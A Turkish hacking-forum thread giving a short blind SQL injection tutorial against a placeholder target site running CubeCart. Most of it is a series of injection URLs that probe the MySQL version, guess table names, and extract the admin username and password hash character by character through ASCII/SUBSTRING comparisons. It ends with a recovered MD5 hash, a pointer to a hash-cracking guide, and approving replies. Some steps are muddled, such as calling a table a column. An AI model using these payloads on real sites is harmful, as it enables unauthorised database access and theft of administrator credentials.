Konuyu Oyla:
  • Derecelendirme: 3.75/5 - 4 oy
  • 1
  • 2
  • 3
  • 4
  • 5
BLinD SQL Enjeksiyon Kısa bir Anlatım
#1
Sürüm’ü sorgulayalım..
http://HEDEFSITE/index.php?id=5 and substring (@@version, 1,1) = 5- –
yaptık sayfa true (doğru) döndü. Eğer 4 yerine 5 yazsaydık versiyon 5 olmadığı için 404.php hatası verecekti.
He bu arada Myql Versiyonu 5 :
Yazdık sürüm 2. 1 …1 ekrana yansıdı.
Şimdi select yani seçme komutunu kabul edip etmediğine bakalım.
http://HEDEFSITE/index.php?id=5 and (select 1)=1– –
Sayfa yine true döndü sorun yok devam.
Not:Burda Blind SQL olup olmadığını öğrenmek içindir.
sub select Tablo_ismi bruteforce(yani tahmin) genelde olabilecek tablo isimleri deneyelim.
Örneğin; “admin” yazalım.
http://HEDEFSITE/index.php?id=5 and (select 1 from admin)=1– –
Eğer admin isminde tablo yoksa hata verecektir zaten var ise sayfa normal yüklenecektir.
Eğer ki sayfa olduğu gibi tekrardan gelir ise bu admin adlı bir tablo bulunduğunun işaretir.
Şimdi mesela biz bruteforce tarafından tabloyu tahmin olarak bulduk.
http://HEDEFSITE/index.php?id=5 and (select 1 from CubeCart_admin_users)=1– –
yaptığımızda CubeCart_admin_users isimli bir sütun olduğundan dolayı problemsiz olarak sayfa true dönecektir.
Diyelim ki hata verdi.
Biz bunu bypass yöntemini kullanarak aşabiliriz.”limit” komutunu kullanarak aşalım.
http://HEDEFSITE/index.php?id=5 and (select 1 from CubeCart_admin_users limit 0,1)=1– –
Böyle yazdık hata verdi.
Şimdi ise bir de ” limit 1,1)=1– ” komutuyla deniyelim..
http://HEDEFSITE/index.php?id=5 and (select substring(concat(1,username),1,1) from CubeCart_admin_users limit 1,1)=1– –
Yazdık sayfa düzeldi.Şimdi CubeCart_admin_users tablosuna ait sütunları(kolon) test edelim;
http://HEDEFSITE/index.php?id=5 and (select substring(concat(1,username),1,1) from CubeCart_admin_users limit 1,1)=1– –
Yazdık sayfa true döndü. Diğer columnuda password olarak buldum.
Devam edelim şimdi “username” ve “password” u birleştirip 1.harf 2.harf 3.harf … diye giderek verileri çekmeye başlayalım.
Verileri birleştirme ve harf1’den başlama;
biz onun parametreye verecek olursa olsun ASCII değeri dönecektir burada hangi ASCII fonksiyonunu kullanacağız
http://HEDEFSITE/index.php?id=5 and ASCII(SUBSTRING((select username from CubeCart_admin_users limit 0,1),1,1))>1– –
Komutumuz bu burada tablo ve column bilgilerini yazıcaz.
Bu 97 kısmı ne derseniz?
Ascii karakterleridir, harflerin sayı karşılığıdır.
Burada ASCII tablosu için bakabilirsiniz.
asciitable.com/
a = 97
ve benzeri
A = 65
bu tablodan görebilirsiniz
http://HEDEFSITE/index.php?id=5 and ASCII(SUBSTRING((select username from CubeCart_admin_users limit 0,1),1,1))=112– –
Yazdık hata vermedi,bizim asıl amacımız hata verdirmek.
Şimdi bir sonraki değeri deniyelim.
http://HEDEFSITE/index.php?id=5 and ASCII(SUBSTRING((select username from CubeCart_admin_users limit 0,1),2,1))=111– –
hata vermedi devam edelim..
http://HEDEFSITE/index.php?id=5 and ASCII(SUBSTRING((select username from CubeCart_admin_users limit 0,1),10,1))>96– –
Yine hata yok.
http://HEDEFSITE/index.php?id=5 and ASCII(SUBSTRING((select password from CubeCart_admin_users limit 0,1),21,1))>52– –
Yazdık sayfa hata verdi, ve karşımızda kullanıcı adı ve hash’ı
kullanıcı adı: HEDEFSITE
admin şifre: 9f66bf57850fbae64d515ffcb8ca6166
Bu kadar, Kolay gelsin..
MD5 Kırma Konusuna burdan devam ediniz - Yine kendi anlatımım. Hayırlı Kullanımlar
cyberizm.org/cyberizm-md5-sifre-kirmayla-alakali-hersey-videolu-resimli-anlatim.html
Beğenenler:
#2
Eline sağlık
Beğenenler:
#3
Güncel exciting
www.deccal.org


Beğenenler:
#4
Harika bir Anlatım ellerine sağlık abim kiss
En büyük acizlik,kendinden başkası gibi görünmektir.
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  Sql Enjeksiyon Admin Authentication Login ByPass Geniş Resimli Videolu Anlatım KingSkrupellos 8 2,269 30-11-2016, Saat: 19:52
Son Yorum: Kolonkun
  2016 Güncel Exploit Dökümanı + Videolu Anlatım KingSkrupellos 2 225 30-11-2016, Saat: 11:11
Son Yorum: Efetimi
  SuspendedPage.Cgi Hacking Yöntemi Konu Anlatım KingSkrupellos 5 137 30-11-2016, Saat: 11:07
Son Yorum: Efetimi
  Sadrazam Shell'de Log Tespiti ve Log Kaydını Silme Yöntemi Detaylı Resimli Anlatım KingSkrupellos 9 274 29-11-2016, Saat: 15:41
Son Yorum: Efetimi
  WordPress File Download Vulnerability (Videolu Anlatım) Mr.F92 25 1,018 27-11-2016, Saat: 20:23
Son Yorum: AhmetGazi
Anahtar Kelimeler

BLinD SQL Enjeksiyon Kısa bir Anlatım indir, BLinD SQL Enjeksiyon Kısa bir Anlatım Videosu, BLinD SQL Enjeksiyon Kısa bir Anlatım Online izle, BLinD SQL Enjeksiyon Kısa bir Anlatım Bedava indir, BLinD SQL Enjeksiyon Kısa bir Anlatım Yükle, BLinD SQL Enjeksiyon Kısa bir Anlatım Hakkında, BLinD SQL Enjeksiyon Kısa bir Anlatım Nedir, BLinD SQL Enjeksiyon Kısa bir Anlatım Free indir, BLinD SQL Enjeksiyon Kısa bir Anlatım Oyunu, BLinD SQL Enjeksiyon Kısa bir Anlatım Download


1 Ziyaretçi